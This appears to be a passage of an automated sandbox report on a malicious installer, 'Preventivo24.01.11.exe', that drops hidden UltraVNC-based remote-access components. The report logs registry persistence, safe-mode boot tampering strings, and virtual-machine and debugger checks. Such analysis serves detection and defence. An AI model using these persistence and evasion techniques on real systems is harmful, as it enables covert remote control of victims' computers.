Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h 0_2_00F9A60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108B2DE push ecx; ret 0_2_0108B2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9D5CA push esi; ret 0_2_00E9D5CC
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx 0_2_00E9FB11
Source: C:\Games\viewer.exe Code function: 6_2_006350CC push ecx; ret 6_2_006350DF
Source: C:\Games\viewer.exe Code function: 6_2_00635676 push ecx; ret 6_2_00635689
Source: C:\Games\taskhost.exe Code function: 41_2_001E6143 push ecx; ret 41_2_001E6156
Source: C:\Games\taskhost.exe Code function: 41_2_000A51FF pushad ; iretd 41_2_000A5218
Source: C:\Games\taskhost.exe Code function: 41_2_000AE25B pushad ; iretd 41_2_000AE25C
Source: C:\Games\taskhost.exe Code function: 41_2_000AE263 pushad ; iretd 41_2_000AE264
Source: C:\Games\taskhost.exe Code function: 41_2_000A5265 push 60F5C5F1h; iretd 41_2_000A5278
Source: C:\Games\taskhost.exe Code function: 41_2_000AE27D pushad ; iretd 41_2_000AE27E
Source: C:\Games\taskhost.exe Code function: 41_2_000AE275 pushad ; iretd 41_2_000AE276
Source: C:\Games\taskhost.exe Code function: 41_2_000AC5A6 pushad ; iretd 41_2_000AC5A9
Source: C:\Games\taskhost.exe Code function: 41_2_000AE5FB pushad ; iretd 41_2_000AE5FC
Source: C:\Games\taskhost.exe Code function: 41_2_000AE603 pushad ; iretd 41_2_000AE604
Source: C:\Games\taskhost.exe Code function: 41_2_000AE61D pushad ; iretd 41_2_000AE61E
Source: C:\Games\taskhost.exe Code function: 41_2_000AE615 pushad ; iretd 41_2_000AE616
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEBB pushad ; iretd 41_2_000ADEBC
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEC3 pushad ; iretd 41_2_000ADEC4
Source: C:\Games\taskhost.exe Code function: 41_2_000ADEDD pushad ; iretd 41_2_000ADEDE
Source: C:\Games\taskhost.exe Code function: 41_2_000ADED5 pushad ; iretd 41_2_000ADED6

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\shi6E82.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmp
Source: taskhost.exe.0.dr Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exe Code function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 41_2_000CAEE0
Source: C:\Games\taskhost.exe Code function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 41_2_000C7AE0
Source: C:\Games\taskhost.exe Code function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC, 41_2_000D37A0
Source: C:\Games\viewer.exe Code function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00633D28
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Games\viewer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 41_2_000C57B0
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 402
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6E82.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Games\taskhost.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Games\viewer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\viewer.exe API coverage: 5.2 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 8544 Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8964 Thread sleep count: 169 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 9112 Thread sleep count: 171 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8212 Thread sleep count: 168 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8260 Thread sleep count: 166 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose, 0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FE3210 FindFirstFileW,FindClose, 0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF3C10 FindFirstFileW,FindClose, 0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose, 0_2_00FCBFF0
Source: C:\Games\taskhost.exe Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 41_2_000BEC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00FF2400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01087833 VirtualQuery,GetSystemInfo, 0_2_01087833
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\
Source: viewer.exe, 0000002A.00000002.1871973925.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWCZ
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Tools)
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: , (Hyper-V Server)
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1697655494.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000977000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700664363.00000000009B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0108F843
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF6910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 0_2_00FF6910
Source: C:\Games\taskhost.exe Code function: 41_2_000C57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 41_2_000C57B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00FC0CA0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108A1CE mov esi, dword ptr fs:[00000030h] 0_2_0108A1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A4796 mov eax, dword ptr fs:[00000030h] 0_2_010A4796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_010A47DA mov eax, dword ptr fs:[00000030h] 0_2_010A47DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01095EA4 mov ecx, dword ptr fs:[00000030h] 0_2_01095EA4
Source: C:\Games\viewer.exe Code function: 6_2_0064B9CA mov eax, dword ptr fs:[00000030h] 6_2_0064B9CA
Source: C:\Games\viewer.exe Code function: 6_2_00643C84 mov eax, dword ptr fs:[00000030h] 6_2_00643C84
Source: C:\Games\taskhost.exe Code function: 41_2_001DC838 mov eax, dword ptr fs:[00000030h] 41_2_001DC838
